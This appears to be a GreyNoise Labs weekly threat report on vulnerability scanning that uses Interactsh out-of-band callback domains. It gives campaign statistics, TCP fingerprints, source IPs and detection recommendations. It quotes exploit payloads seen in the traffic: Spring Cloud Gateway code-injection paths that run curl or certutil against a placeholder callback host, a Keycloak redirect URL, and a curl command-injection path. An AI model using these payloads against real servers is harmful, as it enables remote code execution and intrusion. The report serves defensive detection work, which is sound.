GreyNoise Labs Weekly OAST (Well-known Out-of-band Interaction Domains) Report • Week Ending 2026-01-24

GreyNoise observed 9,004 honeypot sessions from 313 unique IP addresses conducting coordinated vulnerability scanning with OAST callback infrastructure between January 17-23, 2026. Analysis identified 425 distinct scanning campaigns leveraging Interactsh OAST services, with anomalous TCP fingerprinting (MSS=65495) indicating custom scanning tooling or modified network stacks across multiple threat actors.
OAST
MCP
projectdiscovery
interactsh
rce
iocs
detection engineering
cybersecurity
Author

🔮Orbie✨

Published

January 24, 2026

Overview

GreyNoise sensors captured extensive scanning activity targeting web application vulnerabilities with Out-of-band Application Security Testing (OAST) callback domains embedded in exploit payloads. The activity spanned seven days with peak concentration on January 19 (3,548 sessions from 13 IP addresses), indicating a shift from distributed reconnaissance to focused exploitation attempts.

Fingerprint analysis revealed two distinct infrastructure patterns: standard Linux-based scanning (JA4T: 64240_2-4-8-1-3_1460_7, matched to WSL Ubuntu 22.04 in the JA4 database) and anomalous TCP configurations (JA4T: 65495_2-4-8-1-3_65495_7 and 33280_2-4-8-1-3_65495_7) with non-standard Maximum Segment Size values suggesting custom tooling.

OAST domain extraction and decoding produced 5,171 unique callback domains across six Interactsh providers (oast.site, oast.live, oast.me, oast.pro, oast.fun, oast.online), with campaign identifiers revealing 425 separate scanning operations. The top campaign (“nualr”) generated 1,450 unique OAST domains, while the second-largest (“or3ki”) produced 270 domains.

Infrastructure analysis indicates VPS and bulletproof hosting provider concentration, with the top source IP (146.70.116.218, AS9009 M247 Europe SRL, Austria) responsible for 41.8% of all observed sessions.

Temporal Analysis

Date Sessions Unique IPs Peak Hour Activity Notable Patterns
Jan 17 950 156 14:00 UTC (212 sessions) Distributed reconnaissance phase
Jan 18 2,991 261 06:00 UTC (180 sessions) Activity escalation across multiple IPs
Jan 19 3,548 13 08:00-11:00 UTC Concentrated exploitation from AS9009
Jan 20 681 10 Sustained throughout day Post-peak activity continuation
Jan 21 246 25 Intermittent bursts Campaign wind-down
Jan 22 471 13 Low sustained activity Residual scanning
Jan 23 117 13 Sporadic sessions Campaign conclusion

The temporal distribution reveals a classic three-phase pattern: initial distributed reconnaissance (Jan 17), scaling exploitation (Jan 18-19), and sustained lower-volume activity (Jan 20-23). The sharp concentration on January 19 with only 13 source IPs generating 3,548 sessions indicates a transition from broad scanning to focused exploitation infrastructure.

Primary Campaign Analysis

Campaign 1: Spring Cloud Gateway Code Injection (Dominant)

  • Sessions: 2,189+
  • Unique IPs: 177
  • Primary Fingerprint: 65495_2-4-8-1-3_65495_7 + po11nn060000_4ea4093e6290_000000000000_000000000000
  • Secondary Fingerprint: 64240_2-4-8-1-3_1460_7 + po11nn060000_4ea4093e6290_000000000000_000000000000
  • Target Vulnerability: Spring Cloud Gateway Code Injection
  • OAST Provider: All six Interactsh providers
  • Top OAST Campaigns: nualr (1,450 domains), or3ki (270 domains), mmr8b (158 domains)

This campaign represents the majority of observed activity and demonstrates sophisticated scanning infrastructure. The consistent use of OAST callbacks across exploit attempts indicates automated tooling designed to detect successful exploitation through out-of-band DNS/HTTP callbacks.

Infrastructure Characteristics: - Anomalous MSS value (65495) in 2,096 sessions suggests custom TCP stack or modified scanning tool - 232 unique IPs associated with primary fingerprint cluster - Geographic distribution: Austria, Singapore, Malaysia, United Kingdom, France, India, United States - ASN concentration: AS9009 (M247 Europe), AS47583, AS55836, AS14061 (DigitalOcean), AS64457, AS51167 (Contabo)

OAST Decoding Analysis: - Campaign identifier “nualr”: 1,450 domains from machine_id fa:81:71, PID 1181 - Campaign identifier “or3ki”: 270 domains from machine_id c8:c1:ba, PID 4854 - Campaign identifier “mmr8b”: 158 domains from machine_id b3:b3:01, PID 4376

The distinct machine IDs and PIDs indicate at least three separate scanning instances contributing to this campaign, likely coordinated infrastructure or distinct operators using similar tooling.

Campaign 2: Keycloak Open Redirect CVE-2024-8883

  • Sessions: 296
  • Unique IPs: 2-3 distinct
  • Primary Fingerprint: Various (distributed across multiple fingerprints)
  • Target Vulnerability: CVE-2024-8883 (Keycloak Open Redirect)
  • OAST Provider: Primarily oast.site and oast.live

This secondary campaign represents focused exploitation attempts against Keycloak authentication systems. The low IP count (2-3 sources) with 296 sessions indicates high-volume automated scanning from concentrated infrastructure.

Payload Analysis

Payload Type Sessions Unique IPs Primary CVE/Technique OAST Integration
Spring Cloud Gateway Injection 2,189+ 177 Various Spring CVEs Command injection with callback URLs
Keycloak Open Redirect 296 2-3 CVE-2024-8883 Redirect to OAST domains
Generic Web Crawler 9,004 313 N/A All sessions tagged as web crawler activity

Exploit Pattern Examples:

Spring Cloud Gateway attempts use variations of:

/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("curl http://[OAST-DOMAIN]")}__::.x/
/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("certutil -urlcache -split -f http://[OAST-DOMAIN]")}__::.x/

Keycloak exploitation follows redirect patterns:

/realms/master/protocol/openid-connect/auth?redirect_uri=http://[OAST-DOMAIN]

Additional exploitation vectors identified: - Command injection: /ddns_check.ccp with curl https://[OAST-DOMAIN] in parameters - XML external entity (XXE): /sitecore/shell/ClientBin/Reporting/Report.ashx with LDAP OAST callbacks - Directory traversal with command execution: /misc/curl${IFS}[OAST-DOMAIN]/..;/index.html

All payloads demonstrate callback verification strategy - attackers use OAST domains to detect successful exploitation when direct response observation is not reliable.

Infrastructure Analysis

Fingerprint Clustering

JA4T Fingerprint JA4H Fingerprint Sessions Unique IPs MSS Identified OS/Tool
65495_2-4-8-1-3_65495_7 po11nn060000_4ea4093e6290 2,096 232 65495 Custom/Unknown
64240_2-4-8-1-3_1460_7 po11nn060000_4ea4093e6290 1,002 188 1460 WSL Ubuntu 22.04
65495_2-4-8-1-3_65495_7 ge11nn06en00_0e5d97bc8ad6 761 7 65495 Custom/Unknown
65495_2-4-8-1-3_65495_7 ge11nn040000_8391bea91fb6 471 3 65495 Custom/Unknown
65495_2-4-8-1-3_65495_7 ge11nn040000_532a1ee47909 371 10 65495 Custom/Unknown

Key Finding: The MSS value of 65495 is highly anomalous. Standard Ethernet MTU produces MSS=1460. The 64,035 byte delta suggests:

  1. Custom network stack modification in scanning tool
  2. Unusual VPN/tunnel configuration
  3. Deliberately anomalous fingerprinting to avoid detection signatures

This fingerprint cluster accounts for 4,012 sessions (44.6% of total activity) and appears across 215 unique JA4T+JA4H combinations, indicating either a single widely-deployed tool or multiple tools sharing similar TCP stack configurations.

ASN Distribution

ASN Organization Country Sessions Top IP Fingerprint Pattern
AS9009 M247 Europe SRL Austria 3,766 146.70.116.218 MSS=65495 dominant
AS200019 ALEXHOST SRL Moldova 560 193.233.202.173 MSS=65495
AS27176 DataWagon LLC United States 488 103.60.12.224 MSS=1460
AS150654 Kennies Star India Pvt Ltd India 444 38.225.206.91 Mixed
AS51167 Contabo GmbH France/UK 447 Multiple MSS=65495 and 1460
AS14061 DigitalOcean LLC Singapore/US 297 Multiple MSS=65495 and 1460

Infrastructure is heavily concentrated in VPS and bulletproof hosting providers. AS9009 (M247 Europe) accounts for 41.8% of all sessions from a single IP address (146.70.116.218), active January 19-20 with 3,766 sessions over 27 hours.

Attribution Assessment

Confidence: Medium

Evidence for coordinated operations:

  • 425 distinct OAST campaign identifiers decoded from callback domains
  • Consistent targeting of Spring Cloud Gateway across multiple fingerprint clusters
  • Shared OAST provider infrastructure (Interactsh) across campaigns
  • Temporal clustering suggests campaign coordination or shared tasking

Evidence for distinct operators:

  • Wide variance in JA4T+JA4H fingerprint combinations (215 unique pairings)
  • Different machine IDs in OAST decoded data (indicating separate scanning instances)
  • Geographic and ASN distribution suggests distributed infrastructure rather than single operator
  • Mixed use of standard Linux fingerprints (WSL Ubuntu) and anomalous TCP stacks

Assessment:

This activity likely represents multiple threat actors or scanning operations using similar tooling (likely Interactsh-based vulnerability scanners). The anomalous MSS=65495 fingerprint may indicate a specific commercial or open-source scanning tool with custom network configuration, deployed by multiple operators. The concentration in VPS/bulletproof hosting infrastructure is consistent with opportunistic scanning campaigns rather than targeted intrusions.

The decoded OAST campaign identifiers suggest at least 425 separate scanning instances, though many may be retrying operations or parallel scanning from the same infrastructure. The top three campaigns (nualr, or3ki, mmr8b) account for 1,878 domains (36.3% of decoded OAST callbacks) and likely represent the most active operators.

Network IOCs

Primary Source IPs (Top 20)

IP Address Country ASN Organization Sessions First Seen Last Seen
146.70.116.218 Austria AS9009 M247 Europe SRL 3,766 2026-01-19 08:39 2026-01-20 11:37
193.233.202.173 Moldova AS200019 ALEXHOST SRL 560 2026-01-17 05:00 2026-01-22 05:27
103.60.12.224 United States AS27176 DataWagon LLC 488 2026-01-18 07:13 2026-01-18 07:15
38.225.206.91 India AS150654 Kennies Star India Pvt Ltd 444 2026-01-22 05:58 2026-01-22 17:58
37.60.230.90 France AS51167 Contabo GmbH 378 2026-01-17 18:35 2026-01-20 00:18
34.19.112.35 United States AS396982 Google LLC 179 2026-01-19 22:32 2026-01-20 05:26
129.212.209.250 Singapore AS14061 DigitalOcean LLC 98 2026-01-17 19:47 2026-01-21 22:04
149.102.131.223 United Kingdom AS51167 Contabo GmbH 69 2026-01-19 21:23 2026-01-20 09:24
168.107.59.85 South Korea AS31898 Oracle Corporation 66 2026-01-23 09:05 2026-01-23 09:12
216.106.186.24 United States AS63023 GTHost 62 2026-01-18 13:23 2026-01-20 18:05

OAST Providers and Campaign Identifiers

Interactsh Provider Distribution: - oast.site: 2,190 domains (42.3%) - oast.live: 857 domains (16.6%) - oast.me: 705 domains (13.6%) - oast.pro: 517 domains (10.0%) - oast.fun: 478 domains (9.2%) - oast.online: 424 domains (8.2%)

Top OAST Campaign Identifiers: 1. nualr - 1,450 domains (machine_id: fa:81:71, PID: 1181) 2. or3ki - 270 domains (machine_id: c8:c1:ba, PID: 4854) 3. mmr8b - 158 domains (machine_id: b3:b3:01, PID: 4376) 4. djnqr - 147 domains (machine_id: b3:be:b7, PID: 23985) 5. umr8b - 102 domains (machine_id: eb:b3:01, PID: 4396)

Note: 5,171 unique OAST domains decoded across 425 total campaign identifiers.

JA4 Fingerprints for Detection

High-Confidence Malicious Fingerprints:

JA4T (TCP):

65495_2-4-8-1-3_65495_7  # Anomalous MSS - 4,012 sessions
33280_2-4-8-1-3_65495_7  # Anomalous MSS - 279 sessions
64240_2-4-8-1-3_1460_7   # Standard MSS but high volume - 1,385 sessions

JA4H (HTTP) - Top Patterns:

po11nn060000_4ea4093e6290_*  # 3,377 sessions
ge11nn06en00_0e5d97bc8ad6_*  # 917 sessions
ge11nn040000_8391bea91fb6_*  # 471 sessions
ge11nn040000_532a1ee47909_*  # 371 sessions

Combined JA4T+JA4H pairs provide highest fidelity for detection (see Infrastructure Analysis table above for top combinations).

Detection Recommendations

  1. Block or alert on source IPs associated with AS9009, AS200019, AS27176, AS150654 when combined with OAST callback patterns (see Network IOCs section for full list).

  2. Monitor for JA4T fingerprints with MSS=65495 - this anomalous value is rare in legitimate traffic and strongly correlated with scanning activity in this dataset. Network defenders should create alerts for TCP connections with this characteristic MSS value.

  3. Implement JA4 fingerprint-based detection rules for the top 5 JA4T+JA4H combinations listed in Infrastructure Analysis. These fingerprints account for 4,701 sessions (52.2% of total activity).

  4. Prioritize patching Spring Cloud Gateway vulnerabilities - this framework represents the primary target across observed campaigns. Organizations running Spring Cloud Gateway should audit versions and apply available security updates.

  5. Patch Keycloak CVE-2024-8883 if using affected versions - while lower volume, this vulnerability was actively scanned and represents a viable attack vector for authentication bypass.

  6. Implement DNS monitoring for Interactsh OAST domains - all six Interactsh providers (oast.site, oast.live, oast.me, oast.pro, oast.fun, oast.online) were observed. Outbound DNS queries or HTTP connections to these domains from internal infrastructure indicate potential successful exploitation.

  7. WAF rules for OAST callback patterns - implement detection for URL-encoded OAST domain patterns in HTTP parameters, particularly in Spring Cloud Gateway endpoints (/hystrix/*) and authentication flows.

  8. Alert on command injection payloads with curl, certutil, wget, or similar download utilities followed by external domain names in web request parameters.

  9. Monitor for LDAP OAST callback attempts - some payloads use LDAP protocol for out-of-band callbacks (ldap://[OAST-DOMAIN]/), particularly in XXE exploitation attempts.

  10. Implement rate limiting on vulnerable endpoints - the high session volume from individual IPs (3,766 from a single source) demonstrates lack of rate limiting as a contributing factor.

GNQL Queries

Investigate similar activity in GreyNoise:

tags:"Contains Well-known Out-of-band Interaction Domain" last_seen:7d
tags:"Generic Contains Well-known Out-of-band Interaction Domain" last_seen:7d
tags:"Spring Cloud Gateway Code Injection Attempt" last_seen:7d
metadata.asn:AS9009 last_seen:7d
metadata.asn:(AS9009 OR AS200019 OR AS27176 OR AS150654) tags:"Contains Well-known Out-of-band Interaction Domain"
metadata.asn:(AS9009 OR AS200019 OR AS27176 OR AS150654) tags:"Generic Contains Well-known Out-of-band Interaction Domain"
raw_data.ja4_fingerprints.ja4t:65495_2-4-8-1-3_65495_7
tags:"Keycloak Open Redirect CVE-2024-8883 Check" last_seen:30d

Analysis Period: January 17-23, 2026 (7 days)
Data Source: GreyNoise Global Observation Grid
Total Sessions: 9,004
Unique Source IPs: 313
Decoded OAST Domains: 5,171